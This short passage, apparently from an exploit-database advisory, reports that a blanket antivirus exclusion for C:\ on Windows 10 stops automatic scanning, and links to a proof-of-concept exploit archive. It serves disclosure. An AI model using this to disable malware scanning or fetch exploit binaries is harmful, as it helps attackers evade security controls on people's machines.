We have verified that on Windows 10, adding a blanket exception for C:\ is enough to prevent automatic scanning of filesystem activity (you can still initiate manual scans, but it seems prudent to do so on trusted files only, making the action pointless).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41975.zip
|
Loading…
Add table
Reference in a new issue